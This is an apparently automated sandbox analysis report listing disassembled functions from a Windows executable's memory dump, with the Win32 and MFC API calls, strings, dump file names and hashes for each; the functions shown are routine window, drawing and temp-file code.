Function 00C12802 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120fileCOMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00C1280C
CloseHandle.KERNEL32(00C629F7,?,00C629F7,00000080,00C629F7,?,00000000,?,00000000), ref: 00C12845
GetTempPathA.KERNEL32(00000104,00000000,?,00C629F7,00000080,00C629F7,?,00000000,?,00000000), ref: 00C1286C
GetTempFileNameA.KERNEL32(000000FF,AFX,00000000,00000000,000000FF,?,00000000), ref: 00C128A3
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,04000100,00000000,000000FF,?,00000000), ref: 00C128C5

Strings

AFX, xrefs: 00C1289B

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: FileTemp$CloseCreateH_prolog3_catchHandleNamePath
String ID: AFX
API String ID: 1737446630-1300893600
Opcode ID: 98a0011249c0172465a8fb48dbf61a39150f42e7dac153781b9a98d2bc6a15c8
Instruction ID: 925a8f1d065abce633d19037930e2e38acbf92293636bf36eefbfc2a3c9f3bf3
Opcode Fuzzy Hash: 98a0011249c0172465a8fb48dbf61a39150f42e7dac153781b9a98d2bc6a15c8
Instruction Fuzzy Hash: A841BE70800189AFCB10EFA4CD55FEEBBB8EF55310F10429AB555B72D2EB305A45CB61

Function 00C2DAFB Relevance: 10.6, APIs: 7, Instructions: 119windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(00000000,00000407,00000000,?), ref: 00C2DB3E
GetParent.USER32(?), ref: 00C2DB6E
SendMessageA.USER32(?,00000111,?), ref: 00C2DB93
GetParent.USER32(?), ref: 00C2DBB6
RedrawWindow.USER32(?,00000000,00000000,00000105,00000000), ref: 00C2DC1E
GetParent.USER32(?), ref: 00C2DC27
GetWindowLongA.USER32(?,000000F4), ref: 00C2DC41

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Parent$MessageSendWindow$LongRedraw
String ID:
API String ID: 4271267155-0
Opcode ID: eb46da242647ff1a7f4ef7411eff62098af614421879c9e3703dda4f3574d8e2
Instruction ID: ebc6940bb94d4e4b215bcdb44de3d658fcd1152f405ce28eaae234b4c434243e
Opcode Fuzzy Hash: eb46da242647ff1a7f4ef7411eff62098af614421879c9e3703dda4f3574d8e2
Instruction Fuzzy Hash: 0A412930104360EFEB34AB21ECA4F7A77A9FBA5300F124029F5A79B991D7B0ED40CA11

Function 00BDE5C4 Relevance: 10.6, APIs: 7, Instructions: 117windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00BDE5F7
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00BDE61B
UpdateWindow.USER32(?), ref: 00BDE636
SendMessageA.USER32(?,00000121,00000000,?), ref: 00BDE657
SendMessageA.USER32(?,0000036A,00000000,00000002), ref: 00BDE66F
UpdateWindow.USER32(?), ref: 00BDE6B2
PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00BDE6E3

Part of subcall function 00BE240F: GetWindowLongA.USER32(?,000000F0), ref: 00BE241A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 452b1dd42aad004060503762a8a4e7349a9ef3cd1b073897d17784909681c951
Instruction ID: 8fee9687d1b844b5b1083190df77aa56c8cb1b6d19ec2d7a7aba2422833d1462
Opcode Fuzzy Hash: 452b1dd42aad004060503762a8a4e7349a9ef3cd1b073897d17784909681c951
Instruction Fuzzy Hash: B2418F70900685ABCF21AF65CC84EAFFFF4FFA1744F1441AAE451AA2A1E731DA40DB51

Function 00C3A86F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C3A876

Part of subcall function 00BE6B45: __EH_prolog3.LIBCMT ref: 00BE6B4C
Part of subcall function 00BE6B45: LoadCursorA.USER32(00000000,00007F00), ref: 00BE6B78
Part of subcall function 00BE6B45: GetClassInfoA.USER32(?,00000000,?), ref: 00BE6BBC

CopyRect.USER32(?,?), ref: 00C3A92A

Part of subcall function 00BD8095: ClientToScreen.USER32(?,?), ref: 00BD80A6
Part of subcall function 00BD8095: ClientToScreen.USER32(?,?), ref: 00BD80B3

IsRectEmpty.USER32(?), ref: 00C3A943
IsRectEmpty.USER32(?), ref: 00C3A95B
IsRectEmpty.USER32(?), ref: 00C3A970

Strings

Afx:ControlBar, xrefs: 00C3A8A5

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Empty$ClientScreen$ClassCopyCursorH_prolog3H_prolog3_InfoLoad
String ID: Afx:ControlBar
API String ID: 2202805320-4244778371
Opcode ID: ba894cd8795781d5ffb5ac2dcde2b3e21594f7885ed2896d8a48bee826a2dba7
Instruction ID: e1f5b442060b09bcdeb330ddfec870b2f1a99b066c2c04ded7086bd3f1831621
Opcode Fuzzy Hash: ba894cd8795781d5ffb5ac2dcde2b3e21594f7885ed2896d8a48bee826a2dba7
Instruction Fuzzy Hash: 1E4138329002189BCF11DFA4C884BEEB7F5AF09310F050169FD45BB292DB75AA15DB61

Function 00C26EAE Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 111COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C26EB5

Part of subcall function 00C55755: __EH_prolog3.LIBCMT ref: 00C5575C

Part of subcall function 00CA1E3B: SetRectEmpty.USER32(?), ref: 00CA1E6B

SetRectEmpty.USER32(?), ref: 00C26FFD
SetRectEmpty.USER32(?), ref: 00C2700C
SetRectEmpty.USER32(?), ref: 00C27015

Strings

True, xrefs: 00C27020
False, xrefs: 00C2706C

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: EmptyRect$H_prolog3
String ID: False$True
API String ID: 3752103406-1895882422
Opcode ID: 04540a499abd2c63214b74868523b8240a888de953bb151c6732e66818566e32
Instruction ID: 7703be7717f87b5e9319fb3c9d56bb85368ae53221d3d4bdd12e1394fb8849d8
Opcode Fuzzy Hash: 04540a499abd2c63214b74868523b8240a888de953bb151c6732e66818566e32
Instruction Fuzzy Hash: 7851BEB0805B408FC366DF7AC5957DAFBE8BFA4700F50495FE0AE96261DBB02644CB15

Function 00C05079 Relevance: 10.6, APIs: 7, Instructions: 111COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00C050A2
_memset.LIBCMT ref: 00C050BB
_memset.LIBCMT ref: 00C050F5
_memcpy_s.LIBCMT ref: 00C0510F
CreateDIBSection.GDI32(00000000,00000000,00000000,00000008,00000000,00000000), ref: 00C05128
_free.LIBCMT ref: 00C0513A
_free.LIBCMT ref: 00C0516D

Part of subcall function 00CC6B17: HeapFree.KERNEL32(00000000,00000000,?,00CCD4C2,00000000,?,00000000,00CC7501,00CC648B,00000000,?,00BD346D,00BD7426,00000000,?,00BD6596), ref: 00CC6B2D
Part of subcall function 00CC6B17: GetLastError.KERNEL32(00000000,?,00CCD4C2,00000000,?,00000000,00CC7501,00CC648B,00000000,?,00BD346D,00BD7426,00000000,?,00BD6596,0000000C), ref: 00CC6B3F

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: _free$_memset$CreateErrorFreeHeapLastSection_memcpy_s
String ID:
API String ID: 2696690567-0
Opcode ID: 348242101abfbaa3a3af8774c235cff846aaaf835a458d7fbeaf7670ae621794
Instruction ID: 83d838c8bd2d21487fee6f80457706f5dbd93065e860ce36edf99a7b6945ae0f
Opcode Fuzzy Hash: 348242101abfbaa3a3af8774c235cff846aaaf835a458d7fbeaf7670ae621794
Instruction Fuzzy Hash: 5E31A2B2910A15ABDB219F25CC41FAF77ACEF05764F114469E852E7281EB70EE00DFA0

Function 00BDEB8A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00BDEC23
SendMessageA.USER32(00000000,00000405,00000000,?), ref: 00BDEC4C
GetWindowLongA.USER32(?,000000FC), ref: 00BDEC5E
GetWindowLongA.USER32(?,000000FC), ref: 00BDEC6F
SetWindowLongA.USER32(?,000000FC,?), ref: 00BDEC8B

Strings

,, xrefs: 00BDEC42

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: ,
API String ID: 2997958587-3772416878
Opcode ID: 6253e5e4d8945bbcfc1cee20a0dfc11c6c344b8bb6e190b3acde16275cc6be12
Instruction ID: 5e5ab323dfdb683e7388d08c979c1f0d46006bcd63f7c7f255958b949aeade59
Opcode Fuzzy Hash: 6253e5e4d8945bbcfc1cee20a0dfc11c6c344b8bb6e190b3acde16275cc6be12
Instruction Fuzzy Hash: 9D415B756007049FCB24EF65C889A6EFBE5FF48710F150AAEE5969B791EB30E800CB50

Function 00C43090 Relevance: 10.6, APIs: 7, Instructions: 110windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00C430C3

Part of subcall function 00C7273C: RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00C727B3

IsWindowVisible.USER32(?), ref: 00C430ED
IsWindowVisible.USER32(?), ref: 00C43131
RedrawWindow.USER32(?,00000000,00000000,00000585), ref: 00C43153
RedrawWindow.USER32(?,00000000,00000000,00000501), ref: 00C43165
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 00C43187
RedrawWindow.USER32(?,?,00000000,00000541), ref: 00C431B8

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$Redraw$Visible
String ID:
API String ID: 1637130220-0
Opcode ID: 0c99d233bc2811ebfe69cc73232701ce30bedc6dabf25161ddaf968eb2d40aed
Instruction ID: 62ea3ec3ea058d39e1a8e7c1d6a665e9c586aca9f365558e3ef24806ce45436f
Opcode Fuzzy Hash: 0c99d233bc2811ebfe69cc73232701ce30bedc6dabf25161ddaf968eb2d40aed
Instruction Fuzzy Hash: CC416A7160028AEFDB209FA5CDC1AAEBBBABF84340F14457DE56696161D730AF40DB60

Function 00BD24B0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00BD24C8

Part of subcall function 00CDC691: std::exception::exception.LIBCMT ref: 00CDC6A6
Part of subcall function 00CDC691: __CxxThrowException@8.LIBCMT ref: 00CDC6BB

std::_Xinvalid_argument.LIBCPMT ref: 00BD24E6
std::_Xinvalid_argument.LIBCPMT ref: 00BD2501
_memmove.LIBCMT ref: 00BD2564

Strings

invalid string position, xrefs: 00BD24C3
string too long, xrefs: 00BD24E1, 00BD24FC

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$Exception@8Throw_memmovestd::exception::exception
String ID: invalid string position$string too long
API String ID: 1253240057-4289949731
Opcode ID: bf48319f52e71c87c8649168c67cf008609f8b972a2ea80692979a50cc045e56
Instruction ID: d6d8da68e1a24688fdb75976e9eea1f1d7f105cef15ca33b07ef8c3aa776371c
Opcode Fuzzy Hash: bf48319f52e71c87c8649168c67cf008609f8b972a2ea80692979a50cc045e56
Instruction Fuzzy Hash: EE2180313046809BD7249F6CA891A2AF7E5EFB5724B2046AFE5528B341E771D8458760

Function 00BF4ABB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00BF4B38
ScreenToClient.USER32(?,?), ref: 00BF4B45
_memset.LIBCMT ref: 00BF4B53
_free.LIBCMT ref: 00BF4B90
SendMessageA.USER32(?,00000030,260A0EA1,00000000), ref: 00BF4BB2

Strings

,, xrefs: 00BF4B69

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: ClientCursorMessageScreenSend_free_memset
String ID: ,
API String ID: 628317799-3772416878
Opcode ID: fc41875da94bf07126d96bd489e7222c8368fb8cd90a2e70e87da47407e80614
Instruction ID: 1135c8db56f1671afe7c2f5fa5b72c629a5323d35fab6e89caa8ed2bfb39994e
Opcode Fuzzy Hash: fc41875da94bf07126d96bd489e7222c8368fb8cd90a2e70e87da47407e80614
Instruction Fuzzy Hash: 27316C31A00208AFCB18DB64ED85FAEBBF9FB08314F1005A9F515D72A2EB74E904DB10

Function 00C05887 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 90libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00C04F6B: IsIconic.USER32(?), ref: 00C04F8B

GetWindowRect.USER32(?,?), ref: 00C058FF

Part of subcall function 00BD8054: ScreenToClient.USER32(?,?), ref: 00BD8065
Part of subcall function 00BD8054: ScreenToClient.USER32(?,?), ref: 00BD8072

Part of subcall function 00C054F7: __EH_prolog3_GS.LIBCMT ref: 00C05501
Part of subcall function 00C054F7: GetWindowRect.USER32(?,?), ref: 00C05550
Part of subcall function 00C054F7: OffsetRect.USER32(?,?,?), ref: 00C05566
Part of subcall function 00C054F7: CreateCompatibleDC.GDI32(?), ref: 00C055D7
Part of subcall function 00C054F7: SelectObject.GDI32(?,?), ref: 00C055F7

GetModuleHandleA.KERNEL32(DWMAPI), ref: 00C05937
GetProcAddress.KERNEL32(00000000,DwmSetIconicLivePreviewBitmap), ref: 00C05947
DeleteObject.GDI32(00000000), ref: 00C0595E

Strings

DwmSetIconicLivePreviewBitmap, xrefs: 00C05941
DWMAPI, xrefs: 00C05932

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$ClientObjectScreenWindow$AddressCompatibleCreateDeleteH_prolog3_HandleIconicModuleOffsetProcSelect
String ID: DWMAPI$DwmSetIconicLivePreviewBitmap
API String ID: 3205686482-239049650
Opcode ID: 5ec3a675982f4f5dc68b01dbe77d3914963ea26db89ec9fb22954b919120ca3b
Instruction ID: 0f24c884338aa275d302354415011bb53d6a0baa15f89f4b04f1c77479252148
Opcode Fuzzy Hash: 5ec3a675982f4f5dc68b01dbe77d3914963ea26db89ec9fb22954b919120ca3b
Instruction Fuzzy Hash: 93313E71A006069FCB04DFA9C985CBFFBF9EF88700B10456AE116E7251DA706E05CB61

Function 00C1A712 Relevance: 10.6, APIs: 7, Instructions: 82COMMON

Download Yara Rule

APIs

LockWindowUpdate.USER32(00000000,00000000,?,?,?,00C965DA,00000000), ref: 00C1A753
ValidateRect.USER32(?,00000000,?,?,00C965DA,00000000), ref: 00C1A788
UpdateWindow.USER32(?), ref: 00C1A78D
LockWindowUpdate.USER32(00000000,?,00C965DA,00000000), ref: 00C1A7A0
ValidateRect.USER32(?,00000000,?,?,00C965DA,00000000), ref: 00C1A7C7
UpdateWindow.USER32(?), ref: 00C1A7CC
LockWindowUpdate.USER32(00000000,?,00C965DA,00000000), ref: 00C1A7DF

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: UpdateWindow$Lock$RectValidate
String ID:
API String ID: 797752328-0
Opcode ID: 6d64542b46fbed9e3245794ad0002911549caa35f88f6aeec092c80cfe9283d7
Instruction ID: 8ed512fa40d4d15a41b4e47d6d522059f18d2f0f37c708db717944760fca4cb6
Opcode Fuzzy Hash: 6d64542b46fbed9e3245794ad0002911549caa35f88f6aeec092c80cfe9283d7
Instruction Fuzzy Hash: FE21A032202601EFC7158F64D884B98BBB1FF45710F298129E5596B6A0D730AE80EBD2

Function 00C4A578 Relevance: 10.6, APIs: 7, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SetRectEmpty.USER32(?), ref: 00C4A5AC
ReleaseCapture.USER32 ref: 00C4A5CD
GetWindowRect.USER32(?,?), ref: 00C4A5EB
GetParent.USER32(?), ref: 00C4A623
SendMessageA.USER32(?,?,?,00000000), ref: 00C4A63D
SetRectEmpty.USER32(?), ref: 00C4A651
SetRectEmpty.USER32 ref: 00C4A65A

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Empty$CaptureMessageParentReleaseSendWindow
String ID:
API String ID: 2026794321-0
Opcode ID: 05b6149219e792df285c915b07487fbd6eb95597f3ada0c50a0f564b6740beb3
Instruction ID: 5560cee4ea02875971087f47de3e28b7a37a8af4f0991ddaaff6c594f5e4e549
Opcode Fuzzy Hash: 05b6149219e792df285c915b07487fbd6eb95597f3ada0c50a0f564b6740beb3
Instruction Fuzzy Hash: 7C3116B1901659EFCF00DF94D9C8AEEBBB9FB08700F14416AF805AB215C774AA01CFA1

Function 00C42ADD Relevance: 10.6, APIs: 7, Instructions: 80windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 00C42AF5
SendMessageA.USER32(?,0000020A,?,?), ref: 00C42B27
GetFocus.USER32 ref: 00C42B3B
IsChild.USER32(?,?), ref: 00C42B5D
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00C42B8E
IsWindowVisible.USER32(?), ref: 00C42BA3
SendMessageA.USER32(?,0000020A,?,?), ref: 00C42BC1

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageSend$Window$ChildFocusVisible
String ID:
API String ID: 1252167185-0
Opcode ID: 10769d92d3979027db5e3ade8d36f974932a74a8139b51027c895138f5b8cf87
Instruction ID: 4e23f616cb6396354e87109ab366dca61da7d79c72ab12292a297ec578e71365
Opcode Fuzzy Hash: 10769d92d3979027db5e3ade8d36f974932a74a8139b51027c895138f5b8cf87
Instruction Fuzzy Hash: CE213B322007019FDB209F65DC86F2A7BB9FB09750F454569F856DB270DB71ED00AB60

Function 00C00D48 Relevance: 10.6, APIs: 7, Instructions: 80windowthreadCOMMON

Download Yara Rule

APIs

SetFocus.USER32(00000000,00000000), ref: 00C00D68
GetParent.USER32(?), ref: 00C00D76
GetWindowThreadProcessId.USER32(?,?), ref: 00C00D91
GetCurrentProcessId.KERNEL32 ref: 00C00D97
GetActiveWindow.USER32 ref: 00C00DEA
SendMessageA.USER32(?,00000006,00000001,00000000), ref: 00C00DFE
SendMessageA.USER32(?,00000086,00000001,00000000), ref: 00C00E12

Part of subcall function 00BE25A8: EnableWindow.USER32(?,?), ref: 00BE25B9

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$MessageProcessSend$ActiveCurrentEnableFocusParentThread
String ID:
API String ID: 2169720751-0
Opcode ID: 3f611587d53aa3bd55dc469014d1842d1ceefeeee590955ca665444bad38dfab
Instruction ID: d458c26a1b7d0d983b09f686863ec79363c7270c72ae279519e5b6f59910a5db
Opcode Fuzzy Hash: 3f611587d53aa3bd55dc469014d1842d1ceefeeee590955ca665444bad38dfab
Instruction Fuzzy Hash: AA21BF71200B44AFCB219F65CCC8B6A7BE5EF44750F254519F5A59A2E0C771BA80CB60

Function 00C4EA37 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 00C4EA80
GetSystemMenu.USER32(?,00000000,00000000), ref: 00C4EAAE
_memset.LIBCMT ref: 00C4EACD
GetMenuItemInfoA.USER32(?,0000F060,00000000,?), ref: 00C4EAED
SendMessageA.USER32(?,00000112,0000F060,00000000), ref: 00C4EB06

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Strings

0, xrefs: 00C4EADF

Memory Dump Source

